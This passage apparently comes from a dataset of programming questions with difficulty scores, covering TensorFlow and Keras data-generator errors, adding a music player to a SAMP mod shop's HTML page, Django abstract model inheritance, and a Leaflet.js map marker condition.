0., 0., 1., 1., 1., 1., 0., 1., 1., 0., 0., 1., 1., 0., 0., 1., 1.,
0., 0., 0., 1., 0., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 1., 1.,
1., 0., 1., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 0., 1., 1.,
1., 1., 0., 0.]), array([ 5.88235294, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 2.57909216, 3.14661134, 0.27275827, 1.9034191 ,
5.52622316, 5.11921459, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 1.54343144, 4.045605 , 0.60476699, 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 2.29696473, 1.54723127,
0. , 4.84100617, 5.18553758, 3.36605891, 2.55102041,
5.52668871, 4.19776119, 3.37806571, 2.11591536, 9.26713948,
10.24321796, 6.26690712, 15.98594642, 18.96396396, 14.82608696,
3.75567478, 0.29154519, 3.20901995, 0.21477663, 9.41662839,
9.15269597, 7.17682663, 7.17884131, 6.46371977, 3.61201299,
1.90555095, 3.76229158, 2.48557479, 0.69747167, 1.27137221,
3.44827586, 7.39762219, 12.19726993, 11.75438596, 4.68364832,
2.41014799, 0.58749475, 4.12684622, 1.22466216, 3.45733042,
4.32480141, 4.88021295, 1.13636364, 3.32136445, 1.67770419,
5.88505747, 6.37413395]), array([ -1.19699042, -2.05456383, -4.78061559, -2.93522267,
-4.8048048 , -4.39008043, -4.09215956, -4.84094053,
-6.17115581, -2.99612266, -0.80957409, -0.56100982,
-0.66041015, -6.63282572, -7.94520548, -7.70024063,
-3.6252692 , -1.25045973, -12.66453219, -11.6588701 ,
-13.34289813, -5.81304006, -8.6824067 , -21.86218212,
-22.43485342, -22.43485342, -3.27479829, -3.04471931,
-3.88031791, -4.63821892, -2.50354275, -2.51865672,
-2.91531698, -3.49586017, -0.80378251, -1.87090739,
-3.69702435, -4.12823891, -1.66666667, -1.7826087 ,
-6.76846884, -12.41149521, -8.80312229, -9.66494845,
-2.61828204, -3.94200272, -0.73497622, -3.61041142,
-4.33694746, -8.72564935, -7.995029 , -5.04489098,
-1.42032845, -5.8413252 , -5.30469093, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -6.20377979,
-4.01691332, -6.00083928, -2.69331017, -6.54560811,
-3.15098468, -2.78022948, -2.26264419, -5.59440559,
-3.45601436, -5.9602649 , -2.06896552, -1.61662818]), array([0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 1., 1., 1., 0.,
0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 1., 1., 0., 0., 1., 0.,
0., 0., 0., 0., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 1., 1., 1.,
1., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 0., 1., 1., 1.,
1., 0., 0., 0.]), array([ 5.88235294, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 2.57909216, 3.14661134, 2.21616093, 5.67500881,
5.52622316, 5.11921459, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 1.54343144, 4.045605 , 0.60476699, 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 2.29696473, 1.54723127,
0. , 4.93592786, 5.18553758, 4.44132772, 3.61781076,
5.52668871, 4.19776119, 6.94123091, 8.41766329, 11.44208038,
23.52666043, 19.07123535, 15.98594642, 18.96396396, 14.82608696,
3.75567478, 0.29154519, 3.29575022, 3.47938144, 13.87230133,
15.67739012, 10.37613489, 7.17884131, 6.46371977, 3.61201299,
1.90555095, 3.76229158, 2.52996005, 0.69747167, 6.9267865 ,
14.10658307, 12.19726993, 12.19726993, 11.75438596, 4.68364832,
2.41014799, 0.58749475, 4.12684622, 1.22466216, 3.45733042,
4.32480141, 4.88021295, 1.13636364, 3.36624776, 1.67770419,
5.88505747, 6.37413395]), array([ -1.19699042, -3.09868643, -6.58153242, -3.74493927,
-6.94027361, -7.77479893, -5.36451169, -4.84094053,
-6.17115581, -2.99612266, -0.80957409, -3.26086957,
-6.56934307, -9.13705584, -8.04794521, -7.70024063,
-11.88083274, -9.709452 , -14.05193881, -13.70996761,
-13.98852224, -25.17674784, -27.45620716, -21.86218212,
-22.43485342, -22.43485342, -3.27479829, -3.04471931,
-3.88031791, -4.63821892, -2.50354275, -2.51865672,
-2.91531698, -3.49586017, -0.80378251, -1.87090739,
-3.69702435, -4.12823891, -1.66666667, -8.56521739,
-13.20676847, -12.41149521, -8.80312229, -9.66494845,
-2.61828204, -3.94200272, -0.82144401, -5.58354324,
-7.38115096, -9.86201299, -7.995029 , -7.6528431 ,
-4.12782956, -5.8413252 , -5.30469093, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -7.97041906,
-5.28541226, -7.13386488, -3.8662033 , -6.96790541,
-3.58862144, -4.67784643, -4.56965395, -6.90559441,
-4.39856373, -5.9602649 , -2.06896552, -1.61662818]), array([0., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 1., 1., 1., 0., 0., 0., 0., 1., 1., 1., 1., 1.,
1., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
0., 0., 0., 0.])]).
Traceback (most recent call last):
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\data\\ops\\from_generator_op.py\", line 204, in generator_py_func
flattened_values = nest.flatten_up_to(output_types, values)
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\data\\util\\nest.py\", line 237, in flatten_up_to
return nest_util.flatten_up_to(
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\util\\nest_util.py\", line 1541, in flatten_up_to
return _tf_data_flatten_up_to(shallow_tree, input_tree)
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\util\\nest_util.py\", line 1570, in _tf_data_flatten_up_to
_tf_data_assert_shallow_structure(shallow_tree, input_tree)
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\util\\nest_util.py\", line 1444, in _tf_data_assert_shallow_structure
_tf_data_assert_shallow_structure(
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\util\\nest_util.py\", line 1414, in _tf_data_assert_shallow_structure
raise TypeError(
TypeError: If shallow structure is a sequence, input must also be a sequence. Input has type: 'list'.
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\ops\\script_ops.py\", line 270, in __call__
ret = func(*args)
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\autograph\\impl\\api.py\", line 643, in wrapper
return func(*args, **kwargs)
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\data\\ops\\from_generator_op.py\", line 206, in generator_py_func
raise TypeError(
TypeError: `generator` yielded an element that did not match the expected structure. (identical yielded-element dump as above; omitted as a verbatim duplicate)
\t [[{{node PyFunc}}]]
\t [[IteratorGetNext]] [Op:__inference_one_step_on_iterator_7596]",
"stack": "---------------------------------------------------------------------------
InvalidArgumentError Traceback (most recent call last)
Cell In[31], line 12
3 validation_steps = np.ceil(number_of_validation_samples / batch_size).astype(int) # Replace number_of_validation_samples
5 # model.fit(train_gen,
6 # steps_per_epoch=steps_per_epoch,
7 # validation_data=val_gen,
(...)
10
11 # Then use these datasets in your model.fit call
---> 12 model.fit(train_dataset,
13 steps_per_epoch=steps_per_epoch,
14 validation_data=val_dataset,
15 validation_steps=validation_steps,
16 epochs=1000)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\utils\\traceback_utils.py:122, in filter_traceback.<locals>.error_handler(*args, **kwargs)
119 filtered_tb = _process_traceback_frames(e.__traceback__)
120 # To get the full stack trace, call:
121 # `keras.config.disable_traceback_filtering()`
--> 122 raise e.with_traceback(filtered_tb) from None
123 finally:
124 del filtered_tb
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\eager\\execute.py:53, in quick_execute(op_name, num_outputs, inputs, attrs, ctx, name)
51 try:
52 ctx.ensure_initialized()
---> 53 tensors = pywrap_tfe.TFE_Py_Execute(ctx._handle, device_name, op_name,
54 inputs, attrs, num_outputs)
55 except core._NotOkStatusException as e:
56 if name is not None:
InvalidArgumentError: Graph execution error:
Detected at node PyFunc defined at (most recent call last):
<stack traces unavailable>
TypeError: `generator` yielded an element that did not match the expected structure. (same TypeError text, inner tracebacks, and yielded-element dump as in the message field above; omitted as a verbatim duplicate)
\t [[{{node PyFunc}}]]
\t [[IteratorGetNext]] [Op:__inference_one_step_on_iterator_7596]"
}
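The structure mismatch is the list/tuple distinction: output_signature declares the twelve label tensors as a tuple of tf.TensorSpec objects, while the generator yields them as a Python list, and tf.data's nest utilities treat list and tuple as different container types (hence "Input has type: 'list'"). A minimal sketch of the corrected yield, reusing the variable names from the generator above:

# Yield the labels as a tuple so the structure matches output_signature
yield X_batch, (y_high_batch_1d, y_low_batch_1d, y_priority_batch_1d,
y_high_batch_2d, y_low_batch_2d, y_priority_batch_2d,
y_high_batch_3d, y_low_batch_3d, y_priority_batch_3d,
y_high_batch_5d, y_low_batch_5d, y_priority_batch_5d)

Two adjacent issues worth checking, stated as assumptions rather than confirmed causes: each yielded label array is 1-D with shape (batch,), so tf.TensorSpec(shape=(None,), dtype=tf.float32) describes it more accurately than shape=(None, 1); and Input(shape=(72, 6427)) declares every single sample as a 72x6427 matrix, whereas the generator produces 2-D batches of shape (batch, 6427), for which Input(shape=(6427,)) would be the matching declaration.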
|
a6e471421603bc5cf63a1e188762f533
|
{
"intermediate": 0.4520384967327118,
"beginner": 0.3773055672645569,
"expert": 0.1706559956073761
}
|
46,742
|
<!DOCTYPE html><html lang="ru"><head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="title" content="MODER SHOP - площадка по продаже и покупке аккаунтов SAMP">
<meta name="Keywords" content="Магазин аккаунтов SAMP, купить вирты самп, купить аккаунт SAMP, продать аккаунт SAMP, SAMP">
<meta name="description" content="На нашей площадке вы можете купить аккаунт SAMP, либо же продать свой аккаунт в САМП. Это полностью бесплатно, удобно и безопасно, ведь перед продажей аккаунта его проверяют наши боты, а так же в течение 12 часов вы сможете вернуть деньги.">
<title>MODER SHOP - площадка по продаже модов и разработок</title>
<link rel="shortcut icon" href="images/favicon.png" type="image/x-icon">
<link rel="stylesheet" href="css/libs-beta.css">
<link rel="stylesheet" href="css/main-beta.css">
</head>
<body>
<!-- Header Navbar (start) -->
<!--LiveInternet counter--><script type="25e3660b161ee406eb08dbd9-text/javascript">
new Image().src = "//counter.yadro.ru/hit?r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";h"+escape(document.title.substring(0,150))+
";"+Math.random();</script><!--/LiveInternet-->
<nav class="header__navbar garland0 inner__navbar navbar navbar-toggleable-md ">
<div class="container">
<button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
<i class="fas fa-bars"></i>
</button>
<div class="header__navbar__logo"><a href="/"><img src="images/logo.png" alt=""></a></div>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<ul class="header__navbar__menu ml-auto">
<li><a href="/catalog/">Товары</a></li>
<li><a href="/register/">Регистрация</a></li>
<li><a href="/login/">Вход</a></li>
</ul>
</div>
</div>
</nav>
<!-- Header Navbar (end) -->
<!-- Description (start) -->
<section class="index__description">
<div class="container">
<div class="row wow animated fadeInDown">
<div class="col-12">
<h1>MODER SHOP</h1>
<p>The leading shop in the SAMP industry: a wide range of products, verified sellers, secure deals and a regularly updated catalog - you will find all of this in our shop, so don't miss your chance.</p>
<a class="button button-1" href="/catalog/">Modifications</a> <a class="button button-1" href="/money/">Ready-made solutions</a>
<a class="button button-1" href="/buytask/">Place an order</a>
</div>
</div>
<div class="index__macbook wow animated fadeInUp"><img class="img-fluid" src="images/macbook.png" alt=""></div>
</div>
</section>
<!-- Description (end) -->
<!-- Advantages (start) -->
<section class="index__advantages">
<div class="container">
<div class="section__title"><h2>Почему нам стоит доверять?</h2></div>
<div class="index__advantages__items">
<div class="row">
<div class="col-lg-4">
<div class="adv__item wow animated fadeInUp" data-wow-delay="0.2s">
<div class="icon"><div class="bg-adv bg-adv_icon_1"></div></div>
<div class="text">
<h3>It's free</h3>
<p>Registration and listing accounts are completely free; we only take a small percentage of your sales.</p>
</div>
</div>
</div>
<div class="col-lg-4">
<div class="adv__item wow animated fadeInUp" data-wow-delay="0.4s">
<div class="icon"><div class="bg-adv bg-adv_icon_2"></div></div>
<div class="text">
<h3>Security</h3>
<p>After purchase the account is checked by our bot, and if anything is wrong your money will be refunded.</p>
</div>
</div>
</div>
<div class="col-lg-4">
<div class="adv__item wow animated fadeInUp" data-wow-delay="0.6s">
<div class="icon"><div class="bg-adv bg-adv_icon_3"></div></div>
<div class="text">
<h3>Responsive support</h3>
<p>Our managers work 24/7 without days off and are always ready to answer your questions and help resolve any problems that come up.</p>
</div>
</div>
</div>
</div>
<div class="row">
<div class="col-lg-4 offset-lg-2">
<div class="adv__item wow animated fadeInUp" data-wow-delay="0.8s">
<div class="icon"><div class="bg-adv bg-adv_icon_4"></div></div>
<div class="text">
<h3>High demand</h3>
<p>We put enormous effort and investment into promoting our shop in order to outdo all competitors and prove that we are the best.</p>
</div>
</div>
</div>
<div class="col-lg-4">
<div class="adv__item wow animated fadeInUp" data-wow-delay="1s">
<div class="icon"><div class="bg-adv bg-adv_icon_5"></div></div>
<div class="text">
<h3>Free software</h3>
<p>When you sell accounts with us, you get a free checker and never have to pay for one.</p>
</div>
</div>
</div>
</div>
</div>
<center><a class="button button-1 wow animated zoomIn" href="/register/">Sign up</a></center>
</div>
</section>
<!-- Advantages (end) -->
<!-- Footer (start) -->
<footer class="footer wow animated fadeInUp">
<div class="container">
<div class="row d-flex justify-content-between">
<div class="footer__info">
<div class="footer__info__logo"><a href="">SAMP Store</a></div>
<div class="footer__info__copy">
<span class="rights">All rights reserved © 2018-2023<br></span>
<span class="dev">Контакты поддержки:<br> <a target="_blank" href="https://vk.com/berkut_tnt">vk.com</a> | <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="7312171e1a1d3300121e035e00071c01165d0106">[email� protected]</a></span>
<a href="https://www.free-kassa.ru/"><img src="images/18.png"></a>
</div>
</div>
<ul class="footer__menu">
<li><a href="/catalog/">Модификации</a></li>
<li><a href="/money/">Разработки</a></li>
<li><a href="/register/">Зарегистрироваться</a></li>
<li><a href="/login/">Войти</a></li>
</ul>
</div>
</div>
</footer>
<!-- Footer (end) -->
<!-- Load styles and scripts -->
<script data-cfasync="false" src="js/email-decode.min.js"></script><script src="js/scripts.min.js" type="25e3660b161ee406eb08dbd9-text/javascript"></script>
<script src="js/wow.min.js" type="25e3660b161ee406eb08dbd9-text/javascript"></script>
<script src="js/main.js" type="25e3660b161ee406eb08dbd9-text/javascript"></script>
<script type="25e3660b161ee406eb08dbd9-text/javascript">new WOW().init();</script>
<script src="js/rocket-loader.min.js" data-cf-settings="25e3660b161ee406eb08dbd9-|49" defer=""></script>
</body></html>
Add a music player to this code that does not stop when the user navigates to other pages of the site.
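A note on feasibility, plus a sketch. With ordinary multi-page navigation the browser tears the page down on every click, so audio cannot literally keep playing across a full page load; the usual options are turning the site into a single-page app (loading pages via fetch and the History API) or saving the playback position and resuming it on every page. A minimal sketch of the second approach, to be placed on every page just before the closing </body> tag; the file path audio/bg.mp3 and the element id are assumptions, and browser autoplay policies may hold playback until the user interacts with the page once:

<audio id="bg-player" src="audio/bg.mp3" loop></audio>
<script>
  var player = document.getElementById('bg-player');
  // Resume from the position saved by the previous page, if any
  var saved = parseFloat(localStorage.getItem('bgPlayerTime'));
  if (!isNaN(saved)) player.currentTime = saved;
  player.play().catch(function () { /* autoplay blocked until user interaction */ });
  // Save the current position just before the browser leaves the page
  window.addEventListener('beforeunload', function () {
    localStorage.setItem('bgPlayerTime', player.currentTime);
  });
</script>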
|
772ede8581323da9f0ca7ded9416e142
|
{
"intermediate": 0.4479261636734009,
"beginner": 0.43304046988487244,
"expert": 0.11903330683708191
}
|
46,743
|
Write a game about snake
|
a89655b857590106e3bfb2959f277c7f
|
{
"intermediate": 0.34226417541503906,
"beginner": 0.4051211476325989,
"expert": 0.25261467695236206
}
|
46,744
|
code:
# %%
import os
import numpy as np
import pandas as pd
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from tensorflow.keras.layers import Input, Dropout
from tensorflow.keras import Model
# %%
def data_generator(file_paths, batch_size, train=True, scaler=None):
while True: # Loop forever so the generator never terminates
# Shuffle file paths to ensure random distribution of data across files
np.random.shuffle(file_paths)
for file_path in file_paths:
data = pd.read_csv(file_path)
# Split features and labels
X = data.drop([
'Date', 'Symbol',
'y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'], axis=1).values
y_high_1d = data['y_High_1d'].values
y_low_1d = data['y_Low_1d'].values
y_priority_1d = data['y_Priority_1d'].values
y_high_2d = data['y_High_2d'].values
y_low_2d = data['y_Low_2d'].values
y_priority_2d = data['y_Priority_2d'].values
y_high_3d = data['y_High_3d'].values
y_low_3d = data['y_Low_3d'].values
y_priority_3d = data['y_Priority_3d'].values
y_high_5d = data['y_High_5d'].values
y_low_5d = data['y_Low_5d'].values
y_priority_5d = data['y_Priority_5d'].values
# Optionally, apply preprocessing here (e.g., Scaler transform)
if scaler is not None and train:
X = scaler.fit_transform(X)
elif scaler is not None:
X = scaler.transform(X)
# Splitting data into batches
for i in range(0, len(data), batch_size):
end = i + batch_size
X_batch = X[i:end]
y_high_batch_1d = y_high_1d[i:end]
y_low_batch_1d = y_low_1d[i:end]
y_priority_batch_1d = y_priority_1d[i:end]
y_high_batch_2d = y_high_2d[i:end]
y_low_batch_2d = y_low_2d[i:end]
y_priority_batch_2d = y_priority_2d[i:end]
y_high_batch_3d = y_high_3d[i:end]
y_low_batch_3d = y_low_3d[i:end]
y_priority_batch_3d = y_priority_3d[i:end]
y_high_batch_5d = y_high_5d[i:end]
y_low_batch_5d = y_low_5d[i:end]
y_priority_batch_5d = y_priority_5d[i:end]
yield X_batch, (y_high_batch_1d, y_low_batch_1d,y_priority_batch_1d,
y_high_batch_2d, y_low_batch_2d,y_priority_batch_2d,
y_high_batch_3d, y_low_batch_3d, y_priority_batch_3d,
y_high_batch_5d, y_low_batch_5d, y_priority_batch_5d)
# %%
dataset_dir = r'C:\Users\arisa\Desktop\day_spot'
file_paths = [os.path.join(dataset_dir, file_name) for file_name in os.listdir(dataset_dir)]
train_files, val_files = train_test_split(file_paths, test_size=0.06, random_state=42)
batch_size = 72
# %%
# Optional: Initialize a scaler for data normalization
scaler = StandardScaler()
# %%
# Create data generators
train_gen = data_generator(train_files, batch_size, train=True, scaler=scaler)
val_gen = data_generator(val_files, batch_size, train=False, scaler=scaler)
# %%
input_shape = (72, 6427)
inputs = Input(shape=input_shape) # Corrected the input shape specification
x = Dense(6427, activation='relu')(inputs)
x = Dropout(0.25) (x)
x = Dense(3200, activation='relu') (x)
x = Dropout(0.20) (x)
x = Dense(1800, activation='relu') (x)
x = Dropout(0.15) (x)
x = Dense(1024, activation='relu') (x)
x = Dropout(0.10) (x)
x = Dense(512, activation='relu') (x)
x = Dropout(0.05) (x)
x = Dense(256, activation='relu') (x)
x = Dense(128, activation='relu') (x)
x = Dense(64, activation='relu') (x)
x = Dense(32, activation='relu') (x)
# Defining three separate outputs
out_high_1d = Dense(1, name='high_output_1d')(x) # No activation, linear output
out_low_1d = Dense(1, name='low_output_1d')(x) # No activation, linear output
out_priority_1d = Dense(1, activation='sigmoid', name='priority_output_1d')(x)
out_high_2d = Dense(1, name='high_output_2d')(x) # No activation, linear output
out_low_2d = Dense(1, name='low_output_2d')(x) # No activation, linear output
out_priority_2d = Dense(1, activation='sigmoid', name='priority_output_2d')(x)
out_high_3d = Dense(1, name='high_output_3d')(x) # No activation, linear output
out_low_3d = Dense(1, name='low_output_3d')(x) # No activation, linear output
out_priority_3d = Dense(1, activation='sigmoid', name='priority_output_3d')(x)
out_high_5d = Dense(1, name='high_output_5d')(x) # No activation, linear output
out_low_5d = Dense(1, name='low_output_5d')(x) # No activation, linear output
out_priority_5d = Dense(1, activation='sigmoid', name='priority_output_5d')(x)
# Constructing the model
model = Model(inputs=inputs, outputs=[
out_high_1d, out_low_1d, out_priority_1d,out_high_2d, out_low_2d, out_priority_2d,
out_high_3d, out_low_3d, out_priority_3d,out_high_5d, out_low_5d, out_priority_5d])
model.compile(optimizer='adam',
loss={
'high_output_1d': 'mse', 'low_output_1d': 'mse', 'priority_output_1d': 'binary_crossentropy',
'high_output_2d': 'mse', 'low_output_2d': 'mse', 'priority_output_2d': 'binary_crossentropy',
'high_output_3d': 'mse', 'low_output_3d': 'mse', 'priority_output_3d': 'binary_crossentropy',
'high_output_5d': 'mse', 'low_output_5d': 'mse', 'priority_output_5d': 'binary_crossentropy'
},
metrics={
'high_output_1d': ['mae'], 'low_output_1d': ['mae'], 'priority_output_1d': ['accuracy'],
'high_output_2d': ['mae'], 'low_output_2d': ['mae'], 'priority_output_2d': ['accuracy'],
'high_output_3d': ['mae'], 'low_output_3d': ['mae'], 'priority_output_3d': ['accuracy'],
'high_output_5d': ['mae'], 'low_output_5d': ['mae'], 'priority_output_5d': ['accuracy']
},
loss_weights={
'high_output_1d': 1.0, 'low_output_1d': 1.0, 'priority_output_1d': 1.0,
'high_output_2d': 1.0, 'low_output_2d': 1.0, 'priority_output_2d': 1.0,
'high_output_3d': 1.0, 'low_output_3d': 1.0, 'priority_output_3d': 1.0,
'high_output_5d': 1.0, 'low_output_5d': 1.0, 'priority_output_5d': 1.0
}
)
# %%
import os
import pandas as pd
def count_samples(file_paths):
total_samples = 0
for file_path in file_paths:
df = pd.read_csv(file_path)
samples = len(df)
total_samples += samples
return total_samples
number_of_training_samples = count_samples(train_files)
number_of_validation_samples = count_samples(val_files)
print(f'Number of training samples: {number_of_training_samples}')
print(f'Number of validation samples: {number_of_validation_samples}')
# %%
import tensorflow as tf
output_signature = (
tf.TensorSpec(shape=(72, X_batch.shape[1]), dtype=tf.float32), # for X_batch
(
tf.TensorSpec(shape=(72,), dtype=tf.float32), # For each y_batch
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
)
)
train_dataset = tf.data.Dataset.from_generator(
lambda: train_gen,
output_signature=output_signature
)
val_dataset = tf.data.Dataset.from_generator(
lambda: val_gen,
output_signature=output_signature
)
# %%
# You'll need to determine steps_per_epoch and validation_steps based on your data size and batch size
steps_per_epoch = np.ceil(number_of_training_samples / batch_size).astype(int) # Replace number_of_training_samples
validation_steps = np.ceil(number_of_validation_samples / batch_size).astype(int) # Replace number_of_validation_samples
# model.fit(train_gen,
# steps_per_epoch=steps_per_epoch,
# validation_data=val_gen,
# validation_steps=validation_steps,
# epochs=1000)
# Then use these datasets in your model.fit call
model.fit(train_dataset,
steps_per_epoch=steps_per_epoch,
validation_data=val_dataset,
validation_steps=validation_steps,
epochs=1000)
error:
{
"name": "AttributeError",
"message": "'NoneType' object has no attribute 'items'",
"stack": "---------------------------------------------------------------------------
AttributeError Traceback (most recent call last)
Cell In[46], line 12
3 validation_steps = np.ceil(number_of_validation_samples / batch_size).astype(int) # Replace number_of_validation_samples
5 # model.fit(train_gen,
6 # steps_per_epoch=steps_per_epoch,
7 # validation_data=val_gen,
(...)
10
11 # Then use these datasets in your model.fit call
---> 12 model.fit(train_dataset,
13 steps_per_epoch=steps_per_epoch,
14 validation_data=val_dataset,
15 validation_steps=validation_steps,
16 epochs=1000)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\utils\\traceback_utils.py:122, in filter_traceback.<locals>.error_handler(*args, **kwargs)
119 filtered_tb = _process_traceback_frames(e.__traceback__)
120 # To get the full stack trace, call:
121 # `keras.config.disable_traceback_filtering()`
--> 122 raise e.with_traceback(filtered_tb) from None
123 finally:
124 del filtered_tb
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\trainers\\trainer.py:898, in Trainer._pythonify_logs(self, logs)
896 def _pythonify_logs(self, logs):
897 result = {}
--> 898 for key, value in sorted(logs.items()):
899 if isinstance(value, dict):
900 result.update(self._pythonify_logs(value))
AttributeError: 'NoneType' object has no attribute 'items'"
}
|
7d6a7d64f3b8036c1939ffa26f8ceb56
|
{
"intermediate": 0.4991265833377838,
"beginner": 0.354446679353714,
"expert": 0.1464267522096634
}
|
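The 'NoneType' object has no attribute 'items' failure in Keras 3 typically means model.fit ran out of data: tf.data.Dataset.from_generator(lambda: train_gen, ...) wraps a single, already-created Python generator object, which is exhausted after one pass, so later iterations yield nothing and the epoch ends with empty logs. A minimal sketch of the usual fix, assuming that diagnosis; it passes a callable that builds a fresh generator on every (re)iteration, and uses shape (None, 6427) so the last partial batch is accepted and the undefined X_batch reference in the original signature disappears:

n_features = 6427  # assumption: matches the model's input width
output_signature = (
    tf.TensorSpec(shape=(None, n_features), dtype=tf.float32),
    tuple(tf.TensorSpec(shape=(None,), dtype=tf.float32) for _ in range(12)),
)
# build a FRESH generator each time instead of reusing the exhausted train_gen
train_dataset = tf.data.Dataset.from_generator(
    lambda: data_generator(train_files, batch_size, train=True, scaler=scaler),
    output_signature=output_signature,
)
val_dataset = tf.data.Dataset.from_generator(
    lambda: data_generator(val_files, batch_size, train=False, scaler=scaler),
    output_signature=output_signature,
)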
46,745
|
My Django project has two apps, named common and user respectively. I placed an abstract model in the common app and want to inherit from it to make a new model. How do I import the common model correctly?
|
56782bfd84c2525552cf2609dd908072
|
{
"intermediate": 0.6392097473144531,
"beginner": 0.15490299463272095,
"expert": 0.2058873325586319
}
|
46,746
|
In a Django project, two apps were created, named common and user respectively, and an abstract model was placed in common. How do I extend the abstract model in the user app?
|
18ff7772ede3b43a0fd1c37df9c1e3c3
|
{
"intermediate": 0.4307248294353485,
"beginner": 0.22524148225784302,
"expert": 0.34403371810913086
}
|
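Both Django questions above have the same shape: define the abstract base in common/models.py, import it by its dotted module path, and subclass it. A minimal sketch; the model and field names are hypothetical:

# common/models.py
from django.db import models

class TimeStampedModel(models.Model):
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)

    class Meta:
        abstract = True  # Django creates no table for this model

# user/models.py
from django.db import models
from common.models import TimeStampedModel  # import via the app's module path

class Profile(TimeStampedModel):
    display_name = models.CharField(max_length=100)

This works as long as the common app is importable, i.e. both apps are listed in INSTALLED_APPS and live on the project's Python path.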
46,747
|
In JavaScript for Leaflet.js I want to add a green circle marker to firstCityCoords and secondCityCoords when a cafe and a hotel have been added to both stations. However, my if statement 'if (cafeOneBonus > 0 && cafeTwoBonus > 0 && hotelOneBonus > 0 && hotelTwoBonus > 0)' is failing to detect when they have all been added - 'var money = 100000;
var numberOfCarriages = 1;
var speed = 60;
var dailybonus = 0;
var selectedMarker = null; // Variable to store the selected marker
const map = L.map("map").setView([54.2231637, -1.9381623], 6);
// Add custom zoom control to the map with position set to ‘topright’
const customZoomControl = L.control.zoom({ position: "topright" }).addTo(map);
// Remove the default zoom control from the map
map.removeControl(map.zoomControl);
let clickedPoints = [];
let isLineDrawn = false;
let marker; // Declare the marker variable
let progress = 0;
let cafeOneBonus = 0;
let cafeTwoBonus = 0;
let hotelOneBonus = 0;
let hotelTwoBonus = 0;
let buildingRadius = 0;
let buildingRadius2 = 0;
// Function to create circle markers with click functionality
function createCircleMarkers(geojson) {
return L.geoJSON(geojson, {
pointToLayer: function (feature, latlng) {
const circleMarker = L.circleMarker(latlng, {
radius: 4,
fillColor: "#ff7800",
color: "#000",
weight: 0.2,
opacity: 1,
fillOpacity: 0.8,
});
// Attach the feature to the circle marker
circleMarker.feature = feature;
circleMarker.on("mouseover", function () {
this.bindPopup(feature.properties.city).openPopup();
});
circleMarker.on("click", function (e) {
if (!isLineDrawn && selectedMarker !== e.target) {
clickedPoints.push(e.target); // Push the circle marker with attached feature
if (clickedPoints.length === 2) {
const firstCityCoords =
